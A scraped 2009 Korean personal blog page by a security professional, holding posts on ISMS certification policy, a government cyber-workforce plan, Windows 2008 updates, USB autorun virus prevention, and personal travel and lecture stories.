개인정보의 기술적․관리적 보호조치 기준  (0) 2009/05/06
Posted by 엔시스
TAG IT, 개인정보보호, 개인정보보호수집, 고객입장, 사용자입장, 카드사
트랙백 0, 댓글 1개가 달렸습니다.

'보안인닷컴' 네이버후드 어워드 도전

Security License 2009/11/22 00:13


안녕하세요..'보안인닷컴' 운영자입니다. 평소 개인 블로거로서 개인 블로그도 운영하고 있지만 지금 네이버에서 보안커뮤니티 대표카페인 '보안인닷컴(www.boanin.com)을 운영하고 있습니다.

지금까지 열정하나로 운영하고 있으며, 비상업적 커뮤니티로 정보보호에 대한 인식제고 및 보안마인드 향상과 정보 공유 그리고 나눔을 몸소 실천하고 있는 커뮤니티입니다.

2004년 개설하여 그때 막 네이버가 카페를 시작하는 시기이도 합니다. 네이버와 같이 성장해온 커뮤니티이기도 합니다. 보안전문가들 잘하면 기본이고 못하면 자신의 탓으로 화살이 돌아오는 그들

하지만 , 사명감 하나로 지금도 운영자 '엔시스'와 함께 하는 보안전문 커뮤니티가 객관적인 평가를 받고자 2009 네이버후드 어워드 카페 부분에  도전장을 내었습니다..

http://campaign.naver.com/naverhood2009/main2.html

혹시 제 블로그를 찾아 주시는 많은 블로거 분들 지금까지 제 열정을 보시고 평가 해 주실수 있다고 생각이 드시는 분들은 위 링크로 가셔서 '보안인닷컴'을 검색하고 추천과 댓글 부탁드립니다..

감사합니다.


엔시스 올림.



 

'Security License' 카테고리의 다른 글

당신이 진정한 전문가입니다. CISSP 합격자 발표중  (6) 2010/03/05
한국CISSP협회 정기총회 4일 열려  (0) 2009/12/02
'보안인닷컴' 네이버후드 어워드 도전  (0) 2009/11/22
한국CISSP협회 임원모집  (2) 2009/11/03
네이버 대표카페 선정기념 물품이 도착했네요  (5) 2009/11/01
CISSP 4명추천해 주다.  (2) 2009/10/13
Posted by 엔시스
트랙백 0, 댓글 0개가 달렸습니다.

사이버보안관 3000명 인력양성, 백지화 되나?

Security Policy 2009/11/19 11:13

지난 7.7 DDoS 대란으로 인하여 다시한번 정보보호 인식을 하게 되는 계기가 되었습니다. 민간에 공격을 가하던 DDoS 공격이 이제는 국가기관을 향하여 공격을 감행하니까 당연히 촉각이 곤두 설수 밖에 없었습니다.

그래서 관련부처에서 앞 다투어 미래 장미빛 전망을 내 놓았습니다.

이른바 " 사이버보안관 3000명" 양성하겠다....하지만 너무 공수표를 난발 하는게 아닌가 하는 제기도 되었지만 일단 이번에는 국가의 의지를 볼수 있는 계기가 되지 않을까 하는 바램에서 개인적으로도 꼭 이루어지길 바라는 마음이었습니다.

그런 마음을 블로그에 포스팅도 하였습니다. 에초에 조금 무리가 있지 않은가 하는 내용도 포스팅에 있습니다. 자세히 읽어보면

2009/09/14 - [Lecture&Comlumn] - 사이버 보안관 3000명 양성에 대한 제언


그런데 오늘자, 디지털타임스에 의하면

18일 관련 업계와 정부에 따르면 민간 정보보호를 담당하는 방송통신위원회와 인력양성을 담당하는 지식경제부 모두 내년도 예산에 사이버 보안관 양성과 관련한 예산을 배정하지 않았다.
관련기사 : http://www.dt.co.kr/contents.html?article_no=2009111902010860739001&ref=naver


정보보호 인력 양성에 대한 예산 편성이 안되어 있다는 것이 주요 핵심입니다. 정보보호와 보안에 관심을 가지고 있는 한 사람으로서 많은 실망을 가지게 됩니다.


보안에 대한 인식은 "냄비" 보다는 "뚝배기" 근성으로 되어야

7.7 DDoS 공격이 일어난후 약 한달이 지난후에 벌써 사람들 뇌리 속에서 멀어지는게 아니냐는 우려의 목소리가 나왔고 업계에서는 의례 그렇듯이 시간이 지나고 나면 또 잠잠해 지는거 ..당연한거 아니냐는 듯이 받아 들이고 있는 경우도 있었습니다.

하지만 그 시기가 너무 짧아서는 안될 것입니다. 이제 갓 4개월 정도밖에 안되었는데 정보보호종합대책이라고 해서  각종 보안세미나에서 중장기 발표를 하면서 내년 인력 양성에 대한 예산도 편성이 안되었다는 말은 정말 실망스럽기 그지 없습니다.
아직도 우리나라 정보보호에 대한 인식은 멀었다고 생각이 드네요...

당장 사건이 일어나서 호들갑 떠는 것보다는 뚝배기처럼 꾸준하게 관심을 가지고 사이버안전에 만전을 기해야겠습니다. 국가 정책 운영하시는 분들 노고야 알고 있지만, 조금은 더 분발하셔서 정보보호 선진국 진입으로 가는데 총력을 기울였으면 하는 바램을 갖어 봅니다.

전방에서 철책만 잘 막는다고 해서  국가 안전이라 말 할수 없습니다. 이제는 국가 기밀이나 국가 주요 시설 및  담당자 PC에서 정보를 빼 가는 세상에 살고 있습니다. 그러면서 당하고 나면 어떻게 어떻게든  무마시고 또 당하고, 같은 일을 반복하여 하는 결국
"같은 행동을 하면서 다른 결과를 바라는 것은 미친짓' 이라는 말을 어느 책에서 본 기억이 납니다..

두번다시 같은 행동을 하지 않았으면 하는 바램을 가져봅니다. 아예 초기부터 3000명 사이버 보안관 양성은 무리였던 걸까요? 너무 의욕만 앞서기 보다 관련 전문가들과 상의를 하여 충분히 고려하여 공수표를 남발하지 말았으면 하는 바램이 듭니다. 보안에 입문하려던 어린양들이  희망에 들떠 있다가 허파에 바람빠지는 소리가 여기까지 들리기 때문입니다. @엔시스.



'Security Policy' 카테고리의 다른 글

의료정보보호 가이드라인 요약집  (2) 2010/01/29
KISA, 보안 커뮤니티도 적극 지원 활용해야  (2) 2009/12/22
사이버보안관 3000명 인력양성, 백지화 되나?  (2) 2009/11/19
시큐어넷, 웜,해킹바이러스 통계 활용 안되고 있어 아쉬워  (0) 2009/11/11
정보보호전문가 자격증이 국가기술자격증으로 빨리 되어야 하는 이유  (0) 2009/10/09
윤제균 '해운대' 영화감독, 정보보호 홍보대사에 바라는 점  (0) 2009/10/07
Posted by 엔시스
TAG 7.7DDoS, IT, 공수표, 방통위, 사이버보안관, 사이버보안관3000명, 지경부
트랙백 0, 댓글 2개가 달렸습니다

윈도우 2008 라이선스 데이터 쉬트

Operating System/Windows 2009/11/18 12:46

윈도우2008 라이선스에 관련된 내용입니다..참고 바랍니다.

WS08_LicensingDatasheet.xps


'Operating System > Windows' 카테고리의 다른 글

한글 윈도우 2008-R2 한글백서 모음  (0) 2010/01/13
윈도우 2008-R2 기능 콘포넌트 요약정리  (0) 2010/01/13
윈도우 2008 라이선스 데이터 쉬트  (0) 2009/11/18
윈도우 2008 서비스팩 2로 패치하기  (0) 2009/11/16
IT 프로를 위한 포켓북 시리즈  (2) 2009/11/13
IIS 6.0의 보안 취약점  (0) 2009/05/17
Posted by 엔시스
TAG Win2008, 라이선스, 윈도우2008
트랙백 0, 댓글 0개가 달렸습니다.

공공기관 정보보호관리체계 (G-ISMS) 의무화

Security ISMS 2009/11/18 10:49


관련기사: http://www.ddaily.co.kr/news/news_view.php?uid=56449

행정기관용 정보보호관리체계 인증제도인 ‘G-ISMS(가칭)’가 신설돼, 조만간 시행된다.  

행정안전부는 최근 전자정부서비스를 제공하는 행정기관의 지속적인 정보보호수준을 점검·관리하기 위해 정보보호관리체계(ISMS) 인증제도를 운영중인 한국인터넷진흥원(KISA)과 함께 ‘G-ISMS’ 를 만들었다. 이르면 내년부터 전자정부서비스를 제공하는 행정기관을 대상으로 의무화한다는 방침이다.   


민간에서 이루었졌던 KISA ISMS 인증제도가 공공기관까지 적용되게 되었습니다. 이는 바람직한 내용이라 생각을 합니다. 필자가 ISMS 인증심사원 활동을 하면서 느낀 것은 바로 정보보호에 대한 체계가 바로 서 있지 않다라는 것입니다.

정보보호관리체계라는 것은 하나의 프로세스이며 잘 처음 수립하기가 어려워서 그렇지 한번 수립이 되면 그 기준에 따라 잘 이행을 하고 그에 따른 증적 사항을 남겨 놓으면 됩니다.

대부분 이러한 프로세스 정립이 안되어 있다 보니까 일시적인 보안 솔루션 도입에만 그치는 경우가 많습니다. 그리고 정보보호에 대한 대책을 강구 하였다라고 할수 있겠지만 이러한 경우 일정 시간이 지나면 여러가지 문제점들이 발생이 됩니다.

그것은 보안솔루션 도입도 중요하겠지만 실제 그것을 관리하고 운영하는 관리적인 보안이 더 중요할수도 있다는 것입니다. 따라서 꾸준히 관리하고 이행 점검을 해야 하는 것입니다.

이런 일련의 모든 활동을 문서와 절차에 따라 움직이는 프로세스를 정보보호관리체계(ISMS)라 하겠습니다.

우선 내년에 시험적으로 몇군데 하고 나서 의무화 한다는 방침이지만 보안적인 측면에서 보았을땐 아주 중요한 일이라 하겠습니다.


ISMS (정보보호관리체계)는 필자는 이렇게 비유하고 싶습니다.

흐트러지 창고나 방안을 어느날 시간적 여유를 가지고 차분히 앉아서 물건을 정리하면서 어떤것이 나에게 소중하고 어떤것이 버릴것인지를 판단하고 목록을 만들어 잘 정리하여 추후에도 그 목록과 창고에 들어서는 어떻게 돌아가는지를 잘 알수 있는 일련의 활동과 같은 상황이라 생각합니다.


흔히, 보통의 경우 어떠한 것이 우리 조직에 자산으로 잡혀 있는지 또는 어떠한 자산이 위험에 빠졌을때 그 우선순위가 있는지를 대부분 관리를 하지 않고 있습니다.

하지만 이러한 정보보호관리체계를 수립하게 되면 자산에 대한 위험도라든지, 위험평가등을 하여 위험순위가 높은것부터 구분하여 위협으로부터 위험을 감소시키는 대책을 세우는 것입니다. 그리고 KISA ISMS의 경우 15 통제항목에 446개 세부항목을 가지고 있어 주어진 체크리스트에 의하여 관리항목이 통제가 되고 있습니다.

이러한 일련의 정보보호에 대한 체계 수립과 활동이 공공분야 적용이 된다면 담당자는 조금 힘이 들지 몰라도 그 조직에 대한 보안성과 정보보호에 대한 관리는 한결 수훨하고 체계적으로 운영이 될 것입니다.

앞으로 더 활성화 되기를 기대하면서 공공기관 'G-ISMS' 제도가 정착되기를 기대해 봅니다.  @엔시스.


'Security ISMS' 카테고리의 다른 글

정보보호관리체계 인증 등에 관한 고시 ( K-ISMS기준)  (2) 2010/01/17
전자정부 정보보호관리체계지침 (G-ISMS) 문서  (0) 2009/12/17
공공기관 정보보호관리체계 (G-ISMS) 의무화  (2) 2009/11/18
정보보호관리체계(ISMS) 인증심사는 어떻게 진행될까?  (2) 2009/09/22
정보보호관리체계(ISMS) 행정기관 의무화는 당연한것  (2) 2009/09/08
정보보호관리체계(ISMS)인증 심사원 보수교육 후기  (0) 2009/08/29
Posted by 엔시스
TAG ISMS, IT, 보안인닷컴, 엔시스, 전주현, 정보보호관리체계
트랙백 0, 댓글 2개가 달렸습니다

오즈사주카페 -심심풀이 땅콩, 오늘의 운세

My Hobby/Device Review 2009/11/18 10:30


자주 이용하는 편은 아니지만 예전에 신문에서 가끔 보았던 운세풀이....이제는 세월이 모두 휴대폰으로 옮겨지고 있군요...오즈 사주카페라고 해서 오즈추천사이트에 올라와 있네요..

오즈 추천사이트



오즈 메인화면에 사주풀이라고 하여 올라와 있습니다.

후후..신문에서 사주 풀이, 운세 보는 것과 마찬가지로 이제는 휴대폰에서 간단한 오늘의 운세를 볼수 있네요...참 세상 많이 좋아졌습니다..

이제는 점점 모바일로 옮겨지고 있다는 생각이 듭니다.  이러한 현상은 앞으로 가속화 되겠지요. 이 모든것이 데이터 정액요금제를 사용하기 때문에 가능한 것이지요.. 데이터 요금 제일 싼 곳이 바로 LGT 무한자유 요금제입니다...1달에 1G 용량을 주는데 늘 남아서 이렇게 운세도 보고 있습니다.



재물운이 있는데 몸 조심 하랍니다...오늘 하루는 몸 조심해야겠습니다...가끔 심심풀이로 오늘의 운세를 보는 것도 재밌겠군요...

 

'My Hobby > Device Review' 카테고리의 다른 글

10년된 혼수품 TV, XCANVAS로 바꾸다  (2) 2009/12/05
오즈 무한자유정액제로 이젠 네이버 블로깅까지  (8) 2009/11/27
오즈사주카페 -심심풀이 땅콩, 오늘의 운세  (0) 2009/11/18
문자와 오즈 메일 서비스의 조화  (2) 2009/11/11
아레나, 오즈에서 지식 서비스를  (1) 2009/10/26
LGT 오즈와 함께한 결혼 10주년  (1) 2009/10/12
Posted by 엔시스
TAG 무한자유, 오늘의운세, 오즈
트랙백 0, 댓글 0개가 달렸습니다.

윈도우 2008 서비스팩 2로 패치하기

Operating System/Windows 2009/11/16 11:29

윈도우2008이 출시된지도 제법 오래 되었습니다. 그동안 테스트 용도를 꾸준히 살펴 보고 있는데 아직도 눈에 익지 않는 부분들이 많네요..

운영체제를 전부 이해 한다는 것은 많은 시간과 노력이 필요로 합니다. 기존 설치후 업데이트까지 서비스팩1 이었는데 최근 로그인을 해 보니 서비스팩2가 배포 되고 있군요.

               [그림-1] 윈도우 2008 등록정보



          [그림-2] 윈도우 2008 서비스팩2


        [그림-3] 윈도우서비스백2 설치 동의

이후 설치 화면은 기본적인 설치 화면과 동일 합니다. 운영체제는 반드시 주기적인 패치 작업을 해서 운영체제 자체의 취약성이 없도록 관리를 해 주어야 합니다.



[그림-4] 윈도우업데이트 완료 화면

윈도우2008 쓰시는 분들은 업데이트 하셨는지요? 지금 확인해 보시고 그렇지 않으면 업데이트 하시기 바랍니다. 물론 다른 버전도 마찬가지이겠지요..


'Operating System > Windows' 카테고리의 다른 글

윈도우 2008-R2 기능 콘포넌트 요약정리  (0) 2010/01/13
윈도우 2008 라이선스 데이터 쉬트  (0) 2009/11/18
윈도우 2008 서비스팩 2로 패치하기  (0) 2009/11/16
IT 프로를 위한 포켓북 시리즈  (2) 2009/11/13
IIS 6.0의 보안 취약점  (0) 2009/05/17
윈도우보안, 체크유틸리티 사용법-MBSA  (10) 2009/02/17
Posted by 엔시스
TAG 서비스팩2, 윈도우2008
트랙백 1, 댓글 0개가 달렸습니다.

USB 자주쓰다보니 결국 바이러스 걸리더라

Security Skill&Trend 2009/11/16 09:06

보통 usb를 자주 이용하게 됩니다. 보통의 경우 제 노트북이나 확인된 컴퓨터에서 사용하지만 부득이하게 확인 되지 않는 pc에서 사용하는 경우가 있습니다.

그럴경우 의심스럽긴 하지만 어쩔수 없는 상황이라 사용을 하게 됩니다. 그리고나서 다시 확인된 pc에 접속을 할때 결국 어디서인가 바이러스가 감염이 되어서 보안프로그램에서 확인을 해 줍니다.

                            [그림-1] 백신 프로그램에서 usb 바이러스 제거하는 화면


탐지 내용을 보면 자동실행 프로그램인 것입니다. 그나마 백신 프로그램이 설치가 되어 있었기 때문에 제거가 가능한 것입니다. 그렇지 않으면 멀쩡한 pc도 또 감염이 되겠지요..

해당 바이러스가 어떤 것인지 세부적으로 알기 위해 링크를 따라 가 보았습니다.

  [그림-2] 세부적인 바이러스 내용

올해 나온 바이러스로 자동실행 파일로 웜을 퍼트리는 내용이었습니다. usb 자주 사용하시다 보면 결국 바이러스에 감염이 되는군요..철저하게 늘 새로운 컴퓨터에 접속시에는 바이러스 백신 검사를 철처히 하는 습관을 들이시기 바랍니다. 

그럼 어떻게 하면 안전하게 usb를 사용할수 있을까?


 USB 자동실행 방지를 하는 법


[시작]-->[설정]-->[제어판]-->[관리도구]-->[서비스]



          [그림-3] 서비스 메뉴에서 하드웨어 인식 수동내지 사용안함으로 설정


                            [그림-4]  서비스 설정하는 화면

이렇듯 USB를 사용하지 않을수는 없고 사용은 해야 되는데 조심스러운 경우 외부에서 잘 사용하였던 USB도 자신의 PC에 사용하려면 위와 같은 방법으로 체크를 하고 또한 최신 엔진 업데이트 된 백신 프로그램을 반드시 설치 운영하여 사용하도록 하자.


'Security Skill&Trend' 카테고리의 다른 글

IE6.0, IE7.0 제로데이공격 익스플로잇 공개  (0) 2009/11/25
아이폰 SMS & 연락처 리스트 해킹위험  (2) 2009/11/25
USB 자주쓰다보니 결국 바이러스 걸리더라  (8) 2009/11/16
대한민국 아직도 스팸 상위국가 -소포스 시큐리티 레포트  (4) 2009/11/10
AES 암호알고리즘 카툰  (0) 2009/11/09
최근 "N"포털 메일중 스팸메일 조심하세요..  (1) 2009/11/09
Posted by 엔시스
TAG IT, USB, 바이러스감염, 자동실행파일
트랙백 2, 댓글 8개가 달렸습니다

네비에 울고 네비에 웃고-광주출장에서 있었던 에피소드

Life 2009/11/14 10:08


얼마전 광주 출장이있어 광주로 갔었다. 부산에서 출발 할때는  해당 목적지까지 잘 갔었지만 일을 마치고 광주에서 부산으로 오는게 문제였다...부산으로 향하려고 하다가 초행길이라서 네비 찍고 그대로 따라 오긴 했는데 중간에 한번 길을 잘못들어 가 버렸다. 하는수 없이 네비는 경로 재설정을 하더니 길 안내를 해서 무작성 네비만 믿고 따라갔다.

그런데 한참을 가다보니 왠지 외곽으로 빠지는 듯한 느낌이 들었다. 분명히 근처에서 IC를 타야 고속도로로 빨리 가는데 이상한 국도로 빠지기 시작했다. 불안감이 엄습해 오는 순간이었다. 중간에 오다보니 전남대병원 뭐..이런 표지판도 보였던 기억이 난다.


이내 나온곳이 전남 화순군 화순읍..부산까지 가야할 거리는 229KM 까마득하다...


오면서 읍내로 빠지고 국도로 들어오다보니 점점 불안해진다. 그것은 차량 기름이 얼마 없었기 때문이다. 국도에는 시간이 늦어 버리면 주유소 문을 닫아 버리고 주유소도 그리 흔치 않기 때문이다.

그렇다고 광주도 다시 돌아 갈수도 없는 상황...그래서 네비를 믿기로 했다..갈때까지 가보자..지금 시간이 7시 50분 부산도착 예정시간이 11시27분 ..가긴 간다는 이야기니까..가 보자



얼마쯤 달렸을까 네비에서도 보이듯이 주변에 건물이나 인적이 없다. 온통 깜깜하다 오로지 보이는 건 작은 국도 길 하나 ..이거 가면서 점점 불안해진다. 네비가 정말 제대로 나를 안내해 줄것인가?

차에 기름은 점점 떨어지는거 같고..822번 지방도로 들어가는데 어디까지 가야 고속도로를 만날수 있는지 알수 없다. 네비는 늘 잘못 들어간 길은 그 시점에서 다시 GPS로 경로 설정을 다시하기 때문에 어떨 경우엔 아주 둘러서 목적지를 안내하는 경우도 있기 때문이다.

도착시간이 11시50분으로 늘어났다. 지방도로이다보니 주변이 깜깜하고 오고가는 차량도 없어 아주 한적한 시골길을 달리고 있는 것이다. 아..정말 이길이 맞는 것인가 너무 많이 와서 되돌아 갈수도 없다. 끝까지 네비를 믿어 보자..

그 사이에서도 국도에서 길을 잘못 들어 아래길로 내려갔다 다시 올라갔다. 하였다..도저히 안되겠다 싶어 이번에 네비에 부산까지 경로를 취소하고 다시 찍었다. 혹시 더 빠른 길을 다시 안내해 줄지 모르겠다는 생각에서 하였다.

아마 야간에 초행길에 네비만 믿고 따라가다 길 잃어버린 사람은 아마도 많이 공감할것이다. 그것고 아주 시골 깜깜한 국도길..가도 가도 끝이 없는 온통 사방이 깜깜하고 내 자동차 불빛과 네비를 나타나는 네비의 불빛만 있는 한적한 길을 운전하고 있는 나.


그러다 어렴풋하게 나타난 주유소 하나.



아..얼마나 반가운지..보니까 불이켜져 있어 그냥 조금 지나치다가 아무래도 더 헤멜 경우를 대비하여 기름을 넣어야만 했다. 그래서 기름 주유소로 차를 몰았다.

그러더니 거기 사장님이 나오신다. 약간 젊은 사장님이었는데 , 우선 기름부터 넣어야 하기에 이렇게 말했다.

" 사장님, 지금 차 기름 넣을수 있나요? "
"네..가능합니다..얼마 넣어 드릴까요?
"음..우선 2만원만 넣어주세요?"

여기까지 일상적인 대화를 하려다 내가 여기서 부산까지 가려면 어떻게 가야 하나요? 초행길인데 네비 믿고 오다가 여기까지 왔는데 아주 깜깜한게 무섭네요..했더니

" 하하..여기가 밤에는 좀 그렇습니다. 가끔씩 네비가 오락가락 하는경우가 있습니다" 이러면서

대뜸

"커피한잔 드릴까요? " 하시는 것이다. 나는 그말에 잠시 화장실도 다녀 올겸 해서 감사하다라고 말하고 차에서 내렸다. 아마도 이런 한적한 야간 국도에 사람을 만나기도 어려웠고 기름까지 넣어주니 고마웠던 모양이다. 그리고 척 보기에 내가 길을 헤메고 있던 것을 알았던것은 아닐까 생각했다.

아무튼 커피 한잔을 받아 마시고 지금 부산으로 가야 하는데 어떻게 가야 하는지를 물어 보았다. 그 사장님은 자세히 알려주면서

"약 14KM 정도 가면 주암IC가 나옵니다..거기서 IC를 타면됩니다."

즉, 근처에서 고속도로 IC가 있어서 고속도로를 탈수 있다는 것이다...아...네비보다 그 한마디가 더 확신으로 다가 오는 것이 아닌가?

그때 아마도 그 사장님이

" 아..어쩌나 길을 잘못 들어와서 여기서 고속도로 IC로 갈려면 1-2시간을 가야 하는데..한참 잘못 오셨습니다." 라고 말했다면 난 아마도 이 멍청한 네비야 하며 아주 부셔버렸을 것이다.

갈길이 멀기에 잠깐 인사를 하고 명함을 한장 건네 주었다., 그리고 혹시 부산에 오실 일이 있으면 연락한번 달라고 하며 그 주유소를 벗어났다. 그려면서 이것도 추억거리일 것 같아서 몇장의 사진을 찍었다.  아마도 그 사장님은 차가 가다가 갑자기 서서 밖에 나와 사진찍고 하니까 혹시 의아해 했을지도 모르겠다..하지만 블로거 본능은 어쩔수 없다.. 사장님 주유소 잘 되길 바라겠습니다.

지나가는 주유하시는 운전자분들에게 따뜻한 커피 한잔 건네시는 그 마음이면 주유소가 잘 될듯 합니다..아마도 전남 화순군 동북면인가 822번 지방도 가다가 행운휴게소, 유천주유소가 있으면 기름도 좀 넣으시고 해 주시면 좋겠네요..아마도 너무 한적해서 그 사장님도 사람을 만나면 반가울듯 하였습니다.



그 사장님 말씀대로 약 10여 KM 가다보니 주암IC가 나왔다. 역시 네비도 똑똑하게 안내를 하고 있었던 것이다.  단지 내가 그 네비를 못 믿었던 것이다.

주암IC 통과시간이 8시40분



그때부터 다시 호남고속도로로 진입을 하여 부산까지 무사히 오게 되었다. 초행길에 어쩔수 없이 믿고 사용하는 네비게이션 그러나 모로가든 서울만 간다는 식으로 안내 하지는 않을까 하는 불안감... 하지만 잘못 안내시에는 어쩔수 없이 믿고 따라가야만 하는 안내자..네비게이션.

나는 네비를 믿지 못했고, 네비는 아주 한적한 지방국도 그 깜깜한 11월 늦은 가을에 전남 화순군 어떤 시골 읍내를 지나 한적한 지방도를 지나고 있노라니 정말 네비를 믿어야 하나 말아야 하나 하는 생각이 들었다. 그도 그럴것이 차량에 기름이 얼마 없었기에 더욱 조바심이 났었다.

네비에 울고 네비에 웃었지만, 아마도 네비따라 특히 야간에 잘못 길을 들어 헤메었던 분들은 많은 공감을 하지 않았을까 하는 생각이 든다. 따라서 지금처럼 먼길 떠날때에는 기름이라도 빵빵하게 넣고 다녀야겠다. 아주 좋은 추억으로 남을꺼 같고 이번 광주 출장길은 기억에 남을꺼 같다.

덕분에 전남 화순군 화순읍과 기타 그 알지 못하는 지명이 있는 동네에서 길을 잘못들어 이길 저길 다니면서 네비 경로를 몇번이나 재설정하면서 다닌 기억은 길이길이 남을꺼 같다. 운전자들이여 네비를 끝까지 믿어보자.

마지막 집에 와서 미터기를 보니 오늘만 520km 운전만 7시간을 한거 같다. 그래도 그 주유소 사장님 말이 기억이 난다. 그래도 이 국도를 타고 왔기에 30-40분은 단축한 것입니다. 동광주IC를 거치면 쭉 둘러 오기때문에 조금 더 늦죠..

그말대로 11시 50분까지 도착시간이었던 것이 평균 시속100Km로 주행하였기에 딱 1시간 단축해 오기도 하였다..아이리스는 이미 끝나버렸다. 젠장.





'Life' 카테고리의 다른 글

2009년 아이들 크리스마스 선물  (4) 2009/12/25
2009년, 나의 구멍난 구두만큼 뛰었다.  (1) 2009/11/30
네비에 울고 네비에 웃고-광주출장에서 있었던 에피소드  (5) 2009/11/14
오늘은 My Birthday..  (18) 2009/11/07
안정된 직장 & 자신의 통제감  (0) 2009/11/05
간첩(?) 신고하게 된 둘째 아이  (3) 2009/11/04
Posted by 엔시스
TAG 광주, 금남로, 남해고속도로, 네비, 네비게이션, 여행, 출장, 호남고속도로
트랙백 0, 댓글 5개가 달렸습니다

[강연-12] 전남도 지방공무원 교육원 강의 후기

Lecture&Comlumn 2009/11/14 10:03


어제는 전라남도 지방공무원 교육원에 3시간 강의를 하러 다녀 왔다. 1시간은 개인정보보호에 대한 강의와 2시간은 이러한 개인정보를 보호 하기 위한 실습을 해 달라는 요청이었다.

9급부터 6급까지 다양한 지자체에 계신분들을 대상으로 하다보니 조금은 눈높이를 맞추어 교재를 만들었다.

전남도지방공무원 교육원은 광주에 위치하고 있어 부산에서 하는수 없이 자가용을 이용하기로 했다. 그것이 대중교통 이용하고 오는 시간 가는시간을 제외하면 훨씬 유리할 것으로 생각이 되었다.

광주까지는 3시간 소요.

운전하면서 가는 것은 초행길이라 가끔씩 이정표를 찍어 보았다.  광주까지는 부산에서 남해고속도로 --> 호남고속도로를 쭈욱 타고 가기에 3시간동안 직진만 하면 될꺼 같다. 부산에서 광주 가거나 광주에서 부산으로 자가용 이용하는 사람들은 참고 하면 되겠다. 톨비는 10100 정도 나온다.



남해고속도로 초입


비가 올듯말듯한 날씨 먼산에서 안개가 걷히고 있다.

순천방향 진주분기점

광양제철소부근에서 비가 내린다.

광주가 눈에 들어온다.


1시간 이론 강의할 강의장 점심시간을 이용하여 잠시 연수하시는 분들이 사용하고 있어서 미리 사전에 셋팅하지 못하고 정시가 되어서야 셋팅을 하였다. 

개인정보보호에 대한 강의는 지루한 경우가 있어서 동영상을 준비했는데 설치 pc에는 코덱이 안되어서 준비해간 노트북으로 셋팅을 해야만 했다. 강연자는 꼭 자신이 사전에 잘 할수 있도록 만반의 준비를 해야 한다. 안그러면 낭패를 볼수도 있다.

진행자분이신데 사진이 흔들리는 바람에 적당이 모자이크 된것 같다.


사진기가 똑딱이다보니 역시 실내에선 한계가 있다.



1시간 강의는 이렇게 끝나고 나머지 실습 2시간 강의를 하였는데 모두들 아주 참여를 참해 주셨다. 앞에 강의하는 사람도 힘이나서 열정적으로 강의를 했었다.

보통 실습시간에 꼭 딴짓하시는 분들이 있는데 가끔씩 점검을 해 보니 그래도 제법 잘 따라해 주셔서 아주 수업분위기는 좋았다. 제 수업에 참여 해 주셨던 301호실 계신 주사님들 감사드립니다..


강의가 끝마치고 나서 광주지역에 있는 카페 회원이나 트위터 사용자들과 긴급 벙개를 가질려고 하였지만 모두들 긴급 벙개라 스케쥴이 안되어 그냥 금남로 한 커피숍에서 잠시 인터넷을 하였다.


모 커피점..인터넷이 잘되었다.


이렇게 광주 강의는 이렇게 잘 마무리 하였다.  단지, 자가용 이용하니까 운전때문에 조금 피곤하였다..


#1. 에피소드  -네비에 웃고 네비에 울고

강의를 마치고 부산으로 향하려고 하다가 초행길이라서 네비 찍고 그대로 따라 오긴 했는데 중간에 한번 길을 잘못들어 가 버렸다. 하는수 없이 네비는 경로 재설정을 하더니 길 안내를 해서 무작성 네비만 믿고 따라갔다.

그런데 한참을 가다보니 왠지 외곽으로 빠지는 듯한 느낌이 들었다. 분명히 근처에서 IC를 타야 고속도로로 빨리 가는데 이상한 국도로 빠지기 시작했다.

이내 나온곳이 전남 화순군 화순읍..부산까지 가야할 거리는 229KM 까마득하다...


오면서 읍내로 빠지고 국도로 들어오다보니 점점 불안해진다. 그것은 차량 기름이 얼마 없었기 때문이다. 국도에는 시간이 늦어 버리면 주유소 문을 닫아 버리고 주유소도 그리 흔치 않기 때문이다.

그렇다고 광주도 다시 돌아 갈수도 없는 상황...그래서 네비를 믿기로 했다..갈때까지 가보자..지금 시간이 7시 50분 부산도착 예정시간이 1시27분 ..가긴 간다는 이야기니까..가 보자



얼마쯤 달렸을까 네비에서도 보이듯이 주변에 건물이나 인적이 없다. 온통 깜깜하다 오로지 보이는 건 작은 국도 길 하나 ..이거 가면서 점점 불안해진다. 네비가 정말 제대로 나를 안내해 줄것인가?

차에 기름은 점점 떨어지는거 같고..822번 지방도로 들어가는데 어디까지 가야 고속도로를 만날수 있는지 알수 없다. 네비는 늘 잘못 들어간 길은 그 시점에서 다시 GPS로 경로 설정을 다시하기 때문에 어떨 경우엔 아주 둘러서 목적지를 안내하는 경우도 있기 때문이다.

도착시간이 11시50분으로 늘어났다. 지방도로이다보니 주변이 깜깜하고 오고가는 차량도 없어 아주 한적한 시골길을 달리고 있는 것이다. 아..정말 이길이 맞는 것인가 너무 많이 와서 되돌아 갈수도 없다. 끝까지 네비를 믿어 보자..

그 사이에서도 국도에서 길을 잘못 들어 아래길로 내려갔다 다시 올라갔다. 하였다..도저히 안되겠다 싶어 이번에 네비에 부산까지 경로를 취소하고 다시 찍었다. 혹시 더 빠른 길을 다시 안내해 줄지 모르겠다는 생각에서 하였다.

아마 야간에 초행길에 네비만 믿고 따라가다 길 잃어버린 사람은 아마도 많이 공감할것이다. 그것고 아주 시골 깜깜한 국도길..가도 가도 끝이 없는 온통 사방이 깜깜하고 내 자동차 불빛과 네비를 나타나는 네비의 불빛만 있는 한적한 길을 운전하고 있는 나.


그러다 어렴풋하게 나타난 주유소 하나.



아..얼마나 반가운지..보니까 불이켜져 있어 그냥 조금 지나치다가 아무래도 더 헤멜 경우를 대비하여 기름을 넣어야만 했다. 그래서 기름 주유소로 차를 몰았다.

그러더니 거기 사장님이 나오신다. 약간 젊은 사장님이었는데 , 우선 기름부터 넣어야 하기에 이렇게 말했다.

" 사장님, 지금 차 기름 넣을수 있나요? "
"네..가능합니다..얼마 넣어 드릴까요?
"음..우선 2만원만 넣어주세요?"

여기까지 일상적인 대화를 하려다 내가 여기서 부산까지 가려면 어떻게 가야 하나요? 초행길인데 네비 믿고 오다가 여기까지 왔는데 아주 깜깜한게 무섭네요..했더니

" 하하..여기가 밤에는 좀 그렇습니다. 가끔씩 네비가 오락가락 하는경우가 있습니다" 이러면서

대뜸

"커피한잔 드릴까요? " 하시는 것이다. 나는 그말에 잠시 화장실도 다녀 올겸 해서 감사하다라고 말하고 차에서 내렸다. 아마도 이런 한적한 야간 국도에 사람을 만나기도 어려웠고 기름까지 넣어주니 고마웠던 모양이다. 그리고 척 보기에 내가 길을 헤메고 있던 것을 알았던것은 아닐까 생각했다.

아무튼 커피 한잔을 받아 마시고 지금 부산으로 가야 하는데 어떻게 가야 하는지를 물어 보았다. 그 사장님은 자세히 알려주면서

"약 14KM 정도 가면 주암IC가 나옵니다..거기서 IC를 타면됩니다."

